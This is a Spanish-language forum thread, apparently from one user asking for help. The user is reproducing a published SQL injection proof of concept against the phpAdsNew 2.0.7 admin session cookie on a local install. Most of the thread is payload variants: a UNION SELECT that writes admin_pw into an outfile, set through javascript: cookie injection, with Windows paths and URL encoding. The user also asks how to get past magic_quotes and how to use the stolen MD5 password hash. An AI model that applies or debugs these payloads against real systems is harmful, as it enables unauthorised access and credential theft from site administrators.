Hola,

Estoy probando en localhost con la versión (2.0.7)
http://prdownloads.sourceforge.net/phpadsnew/phpAdsNew-2.0.7.tar.gz?use_mirror=switch

La 2.0.8 también tiene vulnerabilidades; pero nadie saco la 'Proof of Concept'

Los 'Advisores': http://www.zone-h.org/content/view/13092/5/

La traducción:

Todas las funciones en /admin/lib-sessions.inc.php no revisan la variable "sessionID" procediente de la cookie, lo más interesante es phpAds_SessionDataFetch() porque esto invoca a config.php y realiza una simple consulta SELECT.


Basta que /admin/config.php este incluido en /admin/index.php, para que no necesitemos estar autenticados y explotemos la vulnerabilidad.

PoC (cookie): sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "/var/www/blah.txt"/*;

Si podeis explicarme esto último que esta en negrilla os agradeceré muchísimo, solo me imagino que:

Tengo que modificar la cookie, ¿me bastará con la extensión Cookie Editor de Firefox?
/var/www/blah.txt en mi caso vendría a ser: C:\program files\apache\htdocs\blah.txt??

De antemano Muchas Gracias!!!!

Holas,

Gracias por tu tiempo.

Despues de ubicarme en http://localhost/phpAdsNew-2.0.7/admin/index.php
Me aventure a poner en la barra de direcciones lo siguiente:

javascript:void(document.cookie="sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt"/*");

javascript:void(document.cookie="sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt");

javascript:void(document.cookie="sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "../blah.txt");

He probado tambien:

http://localhost/phpAdsNew-2.0.7/admin/index.php?javascript:void(document.cookie="sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt"/*");

http://localhost/phpAdsNew-2.0.7/admin/index.php?javascript:void(document.cookie="sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt");

http://localhost/phpAdsNew-2.0.7/admin/index.php?javascript:void(document.cookie="sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:\Program Files\Apache\htdocs\phpAdsNew-2.0.7\blah.txt");

http://localhost/phpAdsNew-2.0.7/admin/index.php?javascript:void(document.cookie="sessionID=adsds'/**/UNION/**/SELECT%20admin_pw%20from%20phpads_config%20into%20outfile%20"../blah.txt");

Y no logro escribir el archivo blah.txt . Me asegure deshabilitar el "solo escritura" de la carpeta.
¿En qué me he equivocado?

En el hipotético caso de que consiguiera la contraseña, esta vendrá en md5 (bd7f72e3882d5ab93f67ci014cf29fcn) y no se cuántos siglos tendré que esperar para conocer la original. Puedo usar de alguna forma la contraseña cifrada??

De nuevo Muchas Gracias!! 

Hola,

Funciona todo a las mil maravillas hasta el punto 4; pero el 5 (obtener C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt) NO 

Quizá el error este en:

Como yo interpreto la cookie, es decir todo esto:

sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt"/*;

Tambien probe:

sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt"/*;

sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt";

sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt"/*

Por cierto ¿Qué función cumple adsds? yo presumo que es un usuario, asi que tambien probe con un usuario real:

sessionID=susana'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "C:/Program Files/Apache/htdocs/phpAdsNew-2.0.7/blah.txt"/*;

¿Qué esta mal?

Muchas Gracias!! Eres mi heroe!!

Hola,

Probe con esto javascript:alert(document.cookie); en IE, Firefox, Opera, y en todos aumenta a la cookie el valor que 'injerto', de esta forma:

sessionID=adsds%2527/**/UNION/**/SELECT%2520admin_pw%2520from%2520phpads_config%2520into%2520outfile%2520%2522C%253A/Program%2520Files/Apache/htdocs/blah.txt%2522/*; sessionID=0b2fbu5166eac5004o08b8b2340a708d

Originalmente sin 'inyectar código', contiene esto:

sessionID=0b2fbu5166eac5004o08b8b2340a708d

Me siento tonta

Se me acaba de ocurrir que magic_quotes puede influir, y pasa que lo tengo 'ON' ¿Cómo lo pongo 'OFF'?

¿Podéis concederme una última gracia? Asi ya no os canso más... =)

Probariaís en vuestro localhost??

Solo pesa 2.5 Mb y la instalación es sencilla, rapidísima, cinco clicks en siguiente y nada más (aparte de llenar los datos de DB y usuario).

http://prdownloads.sourceforge.net/phpadsnew/phpAdsNew-2.0.7.tar.gz?use_mirror=switch

Los 'Advisores': http://www.zone-h.org/content/view/13092/5/

Gracias de aquí hasta la galaxia Andromeda!!!! Sois el tio más majo que 'vive aquí' =)